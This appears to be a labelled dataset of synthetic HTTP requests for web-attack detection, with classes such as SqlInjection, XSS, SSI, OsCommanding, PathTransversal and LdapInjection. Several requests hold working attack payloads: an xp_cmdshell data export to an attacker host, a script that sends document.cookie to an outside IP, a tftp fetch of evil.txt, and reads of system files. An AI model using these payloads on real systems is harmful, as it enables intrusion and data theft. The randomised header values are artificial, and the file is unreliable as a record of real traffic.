If-Unmodified-Since: Sat, 12 Mar 05 19:13:53 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 25 Jun 06 14:21:02 CET
Max-Forwards: 822
MIME-Version: 8.0
Pragma: r2='hqt'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: NTLM aWdlaUlid25PcGhlemNoZ2Vyd3RuU3dnOWhwc3UyU2lpcg==
Range: -640387
Referer: /EHos39s1/Oeneat/eoNSe/enksoo.avi
TE: gzip,chunked,trailers
Trailer: Via
User-Agent: duoienntdh/2.7.7.5.6
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: 3.5 147.116.170.65, oyk/3.9 18.43.240.207, 8.9 29.18.197.225
Transfer-Encoding: deflate
Upgrade: lnphe/4.9
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 228.91.246.96
X-Serial-Number: 855673274232810386
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43262
Start - Id: 45628
class: PathTransversal
GET /Je0/lz.jsp?Atta=031122501&nITwle2lauvka=+Heaqweu%3Eeg&te=oxnaqnme3Tah3&sem5imaca=+&slnb=46315&1rddeiltjos=me%27&dRieMikenqaoue=4k2hrtxkTisuwo7ens&uxhhsTtfsepsio=r%3A%5Cwinnt%5Cboot.ini HTTP/1.1
Host: 131.12.64.214
Connection: anPqib
Accept: application/*;q=0.9
Accept-Charset: x-mac-hebrew
Accept-Encoding: compress;q=0.2, deflate;q=0.1
Accept-Language: aav-tWo, oimr-Udesm;q=0.9
Cache-Control: max-age=6
Client-ip: 95.84.73.85
Cookie: ooheshdgie8lmin=gevb shtpassu1ur;9eureudsnpd=i9qf0R2Fd7Vd;Tetejupeift=hTMulFM;dqoxktHd=8636190;afdrsrep2=oenth;ndilnH=hHlb2a
Cookie2: $Version="56"
Date: Sat, 18 Sep 04 06:10:23 CET
ETag: W/"sYyB35YeGsihhcrLD"
Expect: seoOtore
From: icafeu@elilysn5.com
If-Modified-Since: Fri, 24 Jul 09 18:18:18 UTC
If-Unmodified-Since: Sun, 16 Nov 08 23:06:32 CET
If-Match: "bAsTW383JDRa0PgbyVJ"
If-None-Match: *
If-Range: *
Max-Forwards: 18
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM b2FhZG5ubmVzZTgwd1BHb2V0c2NpZXNiT2VtZXJhYXJvZXRuZnJhbWNhbw==
Authorization: Basic YnNoZ2xZOmFuTzVhMWVt
Range: 41-9272,-212,7881-582
Referer: http://www.geoee.fr/jeOjsf2M/djerlE.asp
TE: chunked
Trailer: Transfer-Encoding
User-Agent: mtt8cxsnlEba
UA-CPU: Sparc
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 822x7787
Via: 6d3/2.2 10.77.140.109
Transfer-Encoding: compress
Upgrade: wdths/1.4, ocajr/8.7, hnt/8.6
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 6406326694
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45628
Start - Id: 39572
class: SSI
POST /roGNzNe/hgt17m3ei7ndl/ceutieneo4tral3lrnRo/eA92SSJ.dll? HTTP/1.1
Content-Length: 93
Content-Language: a
Content-Encoding: gzip
Content-Location: http://bgh8u.com/hne5t7/A82a/fehgieDe.mpg
Content-MD5: enhpSGhvaWhub3RpZWxzbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Dec 08 13:41:11 CET
Last-Modified: Tue, 24 Feb 09 18:21:43 UTC
Host: www.hpnademret.it:9347
Connection: close
Accept: text/*
Accept-Charset: iso-8859-3, cp-936;q=0.8, euc-tw, iso-8859-3, koi8
Accept-Encoding: *
Accept-Language: o-eobntYo;q=0.5, kaswgaeg-orj, c8-a;q=0.7, rr1bw-siIsia, t-stnlneo
Cache-Control: max-stale
Client-ip: 222.71.177.248
Cookie: s94laigau0LerNn=aaea;@v5objectMOtqF=ukvoLW;ilelsoo7ea7d=lF076zVq-xuv;f-2Lz=fui8tdnutsbgsound;swrhaZaHOeiaotq=682
Cookie2: $Version="24"
Date: Fri, 21 Dec 07 09:23:38 CET
ETag: "0znt_obhBQJK@EiG6Fk"
Expect: 100-continue
From: aweeee@nAyt.uk
If-Modified-Since: Tue, 22 Jan 08 01:33:24 UTC
If-Unmodified-Since: Mon, 28 Jul 08 11:13:49 GMT
If-Match: *
If-None-Match: "euxEby7u13viOEm-J"
If-Range: Mon, 18 Jul 05 24:53:33 GMT
Max-Forwards: 640
MIME-Version: 8.5
Pragma: thl4hHrr='i'
Proxy-Authorization: Basic ZXRpYWFVOnNhc2NwbnA=
Authorization: NTLM THR0d2RlZWlscW5yYXRodDF0MGRpd3hhaXN0ZmhzUHN0ZGo1b3dhaG5hc2k=
Range: 54-,-069294,81-
Referer: /E7l4us/eemA/yLe6et/iqXeC9gi.jpg
TE: trailers,chunked;q=0.2,deflate
Trailer: Pragma
User-Agent: Mozilla/8.2 (Windows; U; Windows NT 9.4; er-AL; rv:6.6.3) Gecko/35369455
UA-Disp: 9131,8742,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 645x141
Via: 9.8 www.hreh.js, 6.1 www.ia3nil.tiff
Transfer-Encoding: deflate
Upgrade: bisai/3.4, caeu/5.0, Rop/8.0, Ed1ggb/8.9, tiH/2.5
Warning: 160 24.22.169.229 "rronaouo9om9e1h5" "Mon, 07 Feb 05 22:47:07 GMT"
X-Forwarded-For: 36.239.161.183
X-Serial-Number: 7950474453739700165
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~

4yhsoIisdEmgwl=<!--  #include     virtual="/etc/httpd/httpd.conf"     -->

End - Id: 39572
Start - Id: 47515
class: XSS
GET /ipaswzabioa4ao1thr1/pXuWUAsD_TlbY/dzHQ@n/iprnsiegslihOu/yoyeolzDezrxest/onibhlermvOtxeo/cruuxh/q5stalmbDr1D/kIO/sV/lym9.css?ehdrTetso=8264174&zX-_F=%3Cdiv+++++style%3D++++%22++++binding%3A+++url%28%5Bhttp%3A%2F%2Fwww.ol.com%2Fscript%2FlIcateyl.bin%5D%29%3B+%22+%3E&7wIFE=hcnHrJx3Vxc HTTP/1.1
Host: www.etsjha8LEi.biz:80
Connection: close
Accept: video/*;q=0.3, video/*;q=0.1
Accept-Charset: windows-1251, x-mac-chinesetrad, utf-8, macintosh
Accept-Encoding: 
Accept-Language: sxRb-Ru5R7vtt;q=0.3, l5Nf2e-thein3, neZ-i, 4tee-rD, 9deu-edoh
Cache-Control: no-store
Client-ip: 68.134.125.108
Cookie: aa=eAdk8.SCjW5P;nadz=rcpogeeyelgytmr;0YTitalklr=sGebii8cEbR6T;iriesoaz=uneampiVraxtt;ymaiMtRon9tss=dksi efn>:anodeG;etaoljWh=a5WzytBXNNTA
Cookie2: $Version="7"
Date: Mon, 22 Oct 07 14:59:04 UTC
ETag: "zubBZp.p71Br16Td"
Expect: 100-continue
From: eudn2a@se5tse.com
If-Modified-Since: Fri, 02 Jun 06 23:46:46 CET
If-Unmodified-Since: Tue, 16 Oct 07 02:44:56 CET
If-Match: "sAKpW32jE60bjvhCLn"
If-None-Match: "tr.rxuFMUAUEWJ7aM"
If-Range: *
Max-Forwards: 65
MIME-Version: 9.4
Pragma: IRa='ciniraha'
Proxy-Authorization: Digest uri=/ie6osj/5oiga.php4
Authorization: NTLM M0xpZWUxb0JjeGhmbG96NHBoaWN0d295QW0xcGFuc3I=
Range: -53,788-6
Referer: /ezu8l7f/tpc9hbGa/dlhr6/niem.ace
TE: chunked,trailers,gzip;q=0.1
Trailer: Range
User-Agent: irduvieO0/9.0.4
UA-CPU: PowerPC
UA-Disp: 076,499,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7841x155
Via: 7.7 114.224.208.33
Transfer-Encoding: deflate
Upgrade: atsa/8.3
Warning: 065 134.123.203.94 "ntssttrkginowelli" 
X-Forwarded-For: 71.118.200.104
X-Serial-Number: 870651819
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47515
Start - Id: 47198
class: XSS
GET /Ttahq6drm/_88pr/tkj2uik7/gO/a0/g7nji2ot95o4tnTe/5ymz8/2eolezmNaoaut/nhne4Hjrptnare.nsf?dXUhTuHNWK=esqzWQ&nhb0sfe3heaue8=adminln&ncsnqen=704&eiGIexecrV=%3Ca++href++++%3D++%22javas%26%2399%3Bript%26%2335%3B%5Bwindow.open%28%27http%3A%2F%2F34.230.15.39%2Fnsleel.pl%27%2Bdocument.cookie%29%3B%5D%22++++%3E&yhvnedgreui8t=0706732&R77amHd=%3Ftfu HTTP/1.1
Host: www.Aentihkg.de
Connection: keep-alive
Accept: application/postscript;q=0.1, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: erkee-ieDe, dxeragc-iki, doee-ae, lottoonh-jc;q=0.8
Cache-Control: no-cache
Client-ip: 63.161.16.102
Cookie: iarbsitmelUo=52;eddhS=4vF;JOnullx=87012;CDpjN=933017345;da=dztcedi;RP0uW9b=3111564
Cookie2: $Version="4"
Date: Sat, 01 Dec 07 09:00:01 CET
ETag: W/"M.D_V9Hhyz7aLO5"
Expect: 100-continue
From: oUzNrsR@euuilaosen.cz
If-Modified-Since: Mon, 31 May 04 11:09:44 CET
If-Unmodified-Since: Sun, 12 Jun 05 13:30:07 CET
If-Match: *
If-None-Match: *
If-Range: "K6hLdMPJPUPnTW8"
Max-Forwards: 7
MIME-Version: 9.5
Pragma: lttyp9=a
Proxy-Authorization: Basic OG53NmFmOnNoc0FuYXA=
Authorization: Digest algorithm=MD5-sess
Range: 676-108618,2650-4238
Referer: /aseoas/sbfa9e/Ogeonssr/lptnraw.mp3
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.8 (X11; U; Solaris 5.8; en-ha; rv:0.2.9) Gecko/68477954
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 286x017
Via: HTTP/0.9 0.129.47.217:19015, HTTP/2.2 195.32.189.7:0, 1.5 www.piIriuf.js:824
Transfer-Encoding: 5ore; EErEntt=tRtocaD
Upgrade: urd/1.0
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 25.149.50.16
X-Serial-Number: 533969856895
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47198
Start - Id: 40930
class: SSI
GET /berg8-BeG/lcvCetnmQqExtGB.M/trychpenet/reOCOHzb@VuycL.jpg?9Aoef3yhgt=oet-&egddu=%3C%21--++%23odbc+connect%3D%22hexn%2Cvii%2Cnoyv%22++statement%3D%22select++++*++from+++aorf%22--%3E&aee7itesNsn6a=1Th HTTP/1.1
Host: 54.206.167.220
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, gzip, gzip;q=0.0
Accept-Language: auq-usia, tLsyg-thi, noecmsel-i7d1ni
Cache-Control: no-transform
Client-ip: 120.251.255.184
Cookie: yi1liqelnerqs=h;_YX1=6nIY;r5=cvvneryycxivarallo 
Cookie2: $Version="8"
Date: Fri, 03 Jun 05 21:36:29 UTC
ETag: W/"8masr5MiUJT4dyo4siJ"
Expect: nBhmshg
From: ioOee@owoeu.be
If-Modified-Since: Thu, 01 May 08 07:09:52 UTC
If-Unmodified-Since: Sat, 23 Oct 04 17:19:44 GMT
If-Match: "GcU3ukYOs_89_fP"
If-None-Match: "V3R.dY9QXTqv69W35"
If-Range: *
Max-Forwards: 2
MIME-Version: 4.2
Pragma: neshaEiN=ss
Proxy-Authorization: Basic bGVKc3d0OndWMGU=
Authorization: stzel ahan=tesIlt4n
Range: -25
Referer: http://www.eaeT.de/ttbaomw/hhsdu/caeolf/nbnn/e6icrd.jsp
TE: trailers,trailers,deflate
Trailer: Upgrade
User-Agent: hbcILdmby http://www.grlk.cz
UA-CPU: 68000
UA-Disp: 661,5118,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4871x5124
Via: FTP/2.0 www.Rhatdk.html, Tkna/5.7 168.109.198.131, bzancl/3.2 www.mhet.gif
Transfer-Encoding: ainu; Naowi7=1iAw
Upgrade: datbe/5.7
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 60.122.216.106
X-Serial-Number: 163741114628927
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40930
Start - Id: 41106
class: SqlInjection
GET /2Y.shtml?sOeot=exec+xp_cmdshell+%27bcp+++++%22select++*++++from++cyrb%22++queryout++pwdump.exe+++++-c++++-Craw++++-Shackersip+++-Usa+-Ph8ck3r%27&0hsaW=ax63pB&nci8953d25Er=knptttvcIeidrmaw&aiabynsbjEniee=5toh&we0eRs=hD7j&kkmochar=tGhM7U33&ysefkrvknth=604&2tuteinatrtkn=sa%24tasteite&lHt=asnl%28S%3AIea4dn HTTP/1.0
Host: 202.177.104.21:0
Connection: zceo
Accept: */*;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 212.123.245.198
Cookie: nsUatrbIeeeh3ah=|wtx;asuumccOrrRutls=a3sAbne;psa=DasietDOsafnit1u;roethSA0w=p5rGjwjcqizQ
Cookie2: $Version="183"
Date: Wed, 05 Sep 07 18:55:34 CET
ETag: "08c.BwX7mSH8DfY"
Expect: oNas=evooOddt
From: ctnineei@15crtioebx.de
If-Modified-Since: Fri, 05 Nov 04 20:47:13 CET
If-Unmodified-Since: Sat, 23 Feb 08 20:37:52 UTC
If-Match: *
If-None-Match: "aKihmhKJiNeeRiCI"
If-Range: Mon, 25 May 09 24:43:34 GMT
Max-Forwards: 7609
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="sqsll"
Authorization: 4a1uo 4pt9hp=4broyo
Range: -397
Referer: /taes3dut/ido0/oif5et5/yfs8.jpg
TE: gzip
Trailer: Accept-Language
User-Agent: kWdXEcUMX http://www.efgh6cb.org
UA-CPU: Sparc
UA-Disp: 071,802,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 194x0684
Via: 3.9 169.175.213.156, ec8/8.9 73.188.77.106, tee/9.9 www.2akemqIu.png
Transfer-Encoding: matoan; jymwutb=eigrn
Upgrade: s3t/0.2, css/4.1
Warning: 323 www.l1Er.tiff "djhflegmslO" "Thu, 15 Apr 04 02:45:31 UTC"
X-Forwarded-For: 84.186.228.20
X-Serial-Number: 54708069609443708
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41106
Start - Id: 36578
class: OsCommanding
GET /PBServer/..��../..��../..��../winnt/system32/cmd.exe?/c+dir+c:0 HTTP/1.0
Host: 64.204.162.159
Connection: nwps
Accept: application/postscript;q=0.2
Accept-Charset: windows-1257, cp-936;q=0.0, hz-gb-2312
Accept-Encoding: *;q=0.9
Accept-Language: frp-mh;q=0.1, qg-p;q=0.5, neo2r8Si-a8st2N
Cache-Control: oentus='ufasrulI'
Client-ip: 252.39.154.149
Cookie: Srqi4rLgu5ioR2t=reszt;Xo7Tn=4;y_j02OlW=8121813970;iei=doSlo;.22N=33355157
Cookie2: $Version="543"
Date: Sun, 06 Jan 08 07:52:48 CET
ETag: W/"ii87XQjje42GUbBHrDr"
Expect: eAdl7
From: osNAoh@aHn2nry.de
If-Modified-Since: Mon, 19 Dec 05 21:26:19 UTC
If-Unmodified-Since: Sun, 02 May 04 18:03:23 UTC
If-Match: "OyiTqp.o2UvPoyP3I"
If-None-Match: "fs6g_KNZd_n3gRFg0XQ"
If-Range: Sun, 22 Jan 06 21:38:58 CET
Max-Forwards: 2394
MIME-Version: 3.8
Pragma: u='zoocirr'
Proxy-Authorization: Digest nonce
Authorization: Basic ZXdoY3A6Um5sc3I=
Range: 603-731460,2527-,65-
Referer: /ioasls/ceueeeou/stns/rtiitnas.asmx
TE: trailers,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/0.2 (compatible; nab0rnnhh; SunOS sun4u; Aosaio; 2h0eIbd)
UA-CPU: PowerPC
UA-Disp: 380,5893,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 186x739
Via: HTTP/0.0 www.aredjrc.tiff, 8.2 www.bxed.png, FTP/9.6 www.atenwi.png:5394
Transfer-Encoding: identity
Upgrade: t2w5X/9.8
Warning: 599 www.hAIsisOi.shtml "ocofgRksxyiiso" "Mon, 21 Jun 04 14:43:21 GMT"
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 8032084316017934872
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36578
Start - Id: 45282
class: PathTransversal
GET /t@rjgRaMnKt@Vih4tF/i4.xBEN8DqT@X.amO/qscte8/sDWteoOatac73/G_-ouqvi5l/rvliEwL/ni0ernutotwcrEecliu/04ZzI@8KpU/cjne.bgpz9.php4?pnhso=5&emftqdrsbriaW=45765217&ttsatsA6eo=a&1THEopt..s=7&seeo9oaNtkdcnow=5t%25S%7E&tctudoe1tbbmrEr=a&hwud=ne%7Eaeexecdocumentadocumentdocumentetissechovbscript%29r&ywncToehCrBytim=n%2Fipohix HTTP/1.1
Host: 142.40.233.153
Connection: ontp
Accept: application/zip;q=0.4, application/x-tar;q=0.9, video/*
Accept-Charset: x-mac-roman;q=0.4
Accept-Encoding: N:\\WINNT\\win.ini
Accept-Language: eoechiie-enil3Ibd;q=0.0, l-Ln;q=0.1, dA7gp0-onhr, fnd9Oa-esih9
Cache-Control: only-if-cached
Client-ip: 226.116.80.221
Cookie: kcts=ewsff=lttmpmp&y;rdDsn=46;onprdelklo=jservicesor;citn9moP=6151319560
Cookie2: $Version="4"
Date: Wed, 03 Jan 07 20:34:13 GMT
ETag: W/"5sS.bHdpvUqWsjVo-1h"
Expect: aeTlp=dno8;rrrr=pi9LpXz
From: d4ks@aoejS8oe.be
If-Modified-Since: Mon, 12 Jan 09 04:27:41 CET
If-Unmodified-Since: Wed, 20 May 09 18:13:52 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 97
Pragma: no-cache
Proxy-Authorization: NTLM dGFtbmFwdHZkcnNlMDJpUmtyZHRpRW9lb2VBN2lyemFnZW1oZQ==
Authorization: 2eehPM cybuna=ntil
Range: -3,07-8,-6
Referer: http://ooodh1E.uk/vsunfa8/rmSoor/rIghmi/tITh7.nsf
TE: trailers
Trailer: TE
User-Agent: rtwiEfst (evt5YH; qWNLBZM; qSB_l4X0; du-tz13CQ)
UA-OS: Win9x
Via: 9.2 www.84mis.html, 0.4 138.197.181.109
Transfer-Encoding: nrdoo
Upgrade: sY7kva/6.7, wn5/7.5
Warning: 249 www.tahor3d.jpeg "da7hcghtEielneFaue" "Mon, 11 Dec 06 16:37:58 GMT"
X-Forwarded-For: 238.149.119.17
X-Serial-Number: 1947313
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45282
Start - Id: 41025
class: SqlInjection
GET /v5t/M@Ypsm5L.r.asp?redeadt7wntoeh=exec++xp_cmdshell+++++%27bcp+++%22select+*+++++from+aju88hentd%22++++queryout+pwdump.exe+-c+++-Craw+++++-Shackersip+++++-Usa+-Ph8ck3r%27&caxIg=ej4webroyr&hnora9troso=fokfromlae+ta HTTP/1.1
Host: www.sebme.de
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: big5;q=0.3, windows-1255, x-mac-korean;q=0.0, x-mac-turkish;q=0.2
Accept-Encoding: 
Accept-Language: yi6yesn-not;q=0.6, wTLalih-iGn, dde74E-cee;q=0.1, 2-7lseye, hwdA-onaudeD
Cache-Control: max-age=002
Client-ip: 81.246.100.20
Cookie: rrplike@passwdjY=2Qdnmj.;jtls=hi1;rsiMiR6itAAhts=(eliftp;eeAinz=133019;ui6welinr=nXfBz-e-;nMidmiuQ50e=ynldcuxinirSxtdB
Cookie2: $Version="7"
Date: Tue, 07 Sep 04 10:28:34 UTC
ETag: W/"Vc2bixOBDSoczi4S"
Expect: yuEtt
From: spbhn@ispeCheey.net
If-Modified-Since: Tue, 17 Feb 09 14:47:11 CET
If-Unmodified-Since: Tue, 13 Jan 04 14:34:07 UTC
If-Match: *
If-None-Match: *
Max-Forwards: 6
MIME-Version: 2.6
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: lIainj 9eeoiltf=seddibai
Range: 770-,-93926
Referer: http://seNHd.ch/7leesn/egClAelu/bt5sidl.ace
TE: trailers,trailers,gzip;q=0.9
User-Agent: nhrHdtwo (jIz.Zog4; tNOaJk)
UA-Disp: 3796,7783,32
UA-Color: color16
Via: FTP/2.4 www.hdylu.htm
Transfer-Encoding: compress
Upgrade: ueiDt/4.5, Y8a3e/0.2, set/3.6, emlvo/5.7
Warning: 484 www.41xtiu.shtml "ffgplwga7ia3nttt" "Sun, 25 Apr 10 04:50:48 UTC"
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41025
Start - Id: 38717
class: LdapInjection
GET /s1nd0do/aop5etwuiu3r/aOVrVGfycX9l.-nDg.html?eoemsammr=15022&Gizutmp77o1bnD=wl%29%28%7C+++%28sdxs%3D*%29 HTTP/1.0
Host: www.rEiwmr.net
Connection: alae
Accept: audio/basic, text/plain, video/*
Accept-Charset: utf-7, koi8;q=0.3, cp-936;q=0.8, iso-8859-15;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-stale=779
Client-ip: 95.161.31.177
Cookie: aeD6imsslB=4723568366;mad5mi=ttXTB;Nr4AObautoexecg=oa8SFhhNp@I;uealumg7asms=05;iciieuBt6mt=0685441
Cookie2: $Version="730"
Date: Fri, 02 Nov 07 18:33:05 UTC
ETag: W/"NFQTVepJm2oQTAnAc-"
Expect: 100-continue
From: ilrb@h5ihiwr.cz
If-Modified-Since: Sat, 28 Feb 04 16:49:25 GMT
If-Unmodified-Since: Mon, 13 Apr 09 10:00:37 CET
If-Match: "hBO3-EiL@.CCvD1PA@HY"
If-None-Match: "cJno@Uj23fjxIs1"
If-Range: *
Max-Forwards: 9
MIME-Version: 3.7
Pragma: 8teer3pr='nhI'
Proxy-Authorization: Basic cjY5b0hpZjp0aG1tYW90
Authorization: NTLM eWd1c3NpQWR5ZWh1a3RuOG1ldDRzb2dhbGhpZWJhOXR0Y2FzOEF1dG5jaA==
Range: 5873-
Referer: http://Tsdah6tl.gov/caea6lqw/itow.doc
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/4.7 (X11; U; Solaris 8.4; ob-dw; rv:1.1.8) Gecko/00504879
UA-CPU: 68000
UA-Disp: 115,677,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 094x3377
Via: eituv/9.0 www.cH3sO.png
Transfer-Encoding: gzip
Upgrade: aio/4.8, yfbxla/4.5, a7nrka/5.7
Warning: 342 www.9ohgn.htm:935 "Zduaeomxwo5fiu" "Fri, 23 Dec 05 04:28:42 CET"
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 0697506678006
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38717
Start - Id: 44612
class: OsCommanding
GET /hYR6bSBEetp5f3eEO/zicr/rVuCUhZads1k/nnsaljqcn/oadrelss4c7shrpetne/t4i_p5NzrP95CtT6nK8n/5daxre7rsopotfl/e5BB7Au6sq2ufkbp1pxf/tj0q/u1WjeR4@NAEbP/tPNUdyRmeEBStso-2b0/KA2g_.css?a4ool=16.239.110.139++++%7Ctftp+192.168.10.33+evil.txt&enigfeh=Toerv&1rW=%3F6m HTTP/1.0
Host: 178.40.79.4:72796
Connection: tncr
Accept: video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 69.114.91.22
Cookie: ol3Nivro=3800090;p1eohe1Ihov=?@eoi;5wt=ws eoer>]ertmpnhaisi-p
Cookie2: $Version="4"
Date: Thu, 17 Jan 08 16:49:58 GMT
ETag: W/"s5g6qnsYgtokpr41lg"
Expect: sics3mi=5hos2;rStOaann
From: yrtaag@x3hp5xn5i.net
If-Modified-Since: Tue, 19 Jun 07 17:48:55 CET
If-Unmodified-Since: Thu, 05 Oct 06 12:29:28 UTC
If-Match: "JUf9cCc.LZTIJK58Vc"
If-None-Match: "_sJQ4O0wg_5rudB3"
If-Range: Sun, 09 Apr 06 08:33:41 CET
Max-Forwards: 27
MIME-Version: 1.7
Pragma: 5cera=kee
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Digest response="bcBA5C86dA8FD934F8fC0b716E978acc"
Range: 6245-9,4665-34,-76
Referer: http://hirbhnup.de/Meid/eanazle/Igsoli/aRrln.tar.gz
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/7.6 (Windows; U; WinNT 9.7; od-ea; rv:1.2.7) Gecko/32494227
UA-Disp: 0488,6492,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 494x0584
Via: HTTP/5.3 188.64.121.58
Transfer-Encoding: gzip
Upgrade: oTe/6.3, en2/3.5, hq1ltn/9.0, 9elp1/2.1, Esotly/2.0
Warning: 294 www.eeugeo2c.png "bVo5d8oDShGrt1n" 
X-Forwarded-For: 117.132.107.47
X-Serial-Number: 92326230406152
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44612
Start - Id: 41388
class: SqlInjection
PUT /fSaitSarItn/to3/eZgmRC9mCypG_M-/awien/uw6AmnhieQsneyih/0aoEsStacbR6nn/tletdIanaeeenrn0M/1bEZHk/lee/n8otWzmhS.6IJ_HxH.htm? HTTP/1.1
Content-Length: 114
Content-Language: eb7oe
Content-Encoding: identity
Content-Location: http://www.omhr59tm.uk/whuSiumI/sise/ipyQ3Tel.mspx
Content-MD5: dW50cmdjZGpPZWN6OWV2Yw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 Feb 07 07:11:19 UTC
Last-Modified: Fri, 10 Jun 05 05:53:35 CET
Host: www.aaee9t.de:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.7, deflate;q=0.7, deflate;q=0.5, gzip, gzip;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 65.244.212.38
Cookie: Esrdul3Tndynd=hndn3g8t8nnyt;ay=rp&msY]ey;tyhmtwsp=Er1xterm'Aeu s] e ;eet51esu3d8x=61156;omncEeteet=o7ruie
Cookie2: $Version="753"
Date: Wed, 12 Mar 08 21:51:40 CET
ETag: "lIiRlIPKte_9Hpgpj"
Expect: Nerh01=hehmt9
From: oEdin@hmo60q.fr
If-Modified-Since: Fri, 20 Jun 08 07:08:22 UTC
If-Unmodified-Since: Sun, 04 Jan 09 01:16:08 CET
If-Match: "EboqNOx.@Xzm7R962j"
If-None-Match: *
If-Range: "HB64axQpcWVoMO5qTqJ"
Max-Forwards: 22
MIME-Version: 2.2
Pragma: osd='1k75ipmn'
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: Basic dGhlYml5YzpubnVVTHAw
Range: 711-
Referer: /rsSuaOdw.tar.gz
TE: chunked;q=0.2
Trailer: Accept-Language
User-Agent: Mozilla/7.2 (X11; U; Open BSD i586 3.8; 3e-je; rv:2.2.0) Gecko/90555283
UA-CPU: 68000
UA-Disp: 727,089,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1178x5140
Via: rhlswi/0.0 179.26.152.175
Transfer-Encoding: deflate
Upgrade: bwir7/9.5, 0rA2/5.4
Warning: 978 www.aeers.png "pstsl2qua0E" "Sat, 06 Mar 10 21:32:52 GMT"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 3067055271
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

AaItdus51vtn2=OrigText'OR'Eo6se'  ='mtn'&doensutedstis=mem6ai&wYlocationwG.yQ0=snmNssrzedpDrebgsounds0

End - Id: 41388
Start - Id: 44676
class: PathTransversal
GET /pfbnneyS/ooUe/yGNDZ.jpeg?oCsrnn=anig%3Aimyo&m7e=zrobjectTn%27+b3gudo%3Fe&uraludhEhxdeq=krondn9et43oiyEp&ZajtelnetDD=ry+ie&etegjemaocka=ovarsrat&F3S.pKLI=nszwa&ito0ddtw=438245&tjed=cmeIKR&olleea=1&escth6owoh=tse0e0w9c&5QwgetFI2=xnodeO9%27s&nrTtn=pkebetweenTlloasbetweentbxha&isretueohzh=634&ybpmyg3u8EcLb5=1&mBoeahin362e=2 HTTP/1.0
Host: www.oHsdr.ch
Connection: close
Accept: application/*;q=0.0, image/jpeg;q=0.6, text/*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=2
Client-ip: 81.82.11.236
Cookie: fs=Dxp_ot;oedee3G=%2e%2e.\%252f/\%252f/...\%252e..%2e
Date: Sun, 07 Jan 07 02:06:28 UTC
If-Match: "t0NEjvRR7yPzaPt@f"
If-Range: "nFsY3ehg5i-hobNI"
Referer: /ddsti/lonhO/yed7Nce/wh9zho.asp
User-Agent: Mozilla/9.2 (compatible; annAeaarno; Open BSD i386; udgcePejt; nen9lrC)

null

End - Id: 44676
Start - Id: 45024
class: PathTransversal
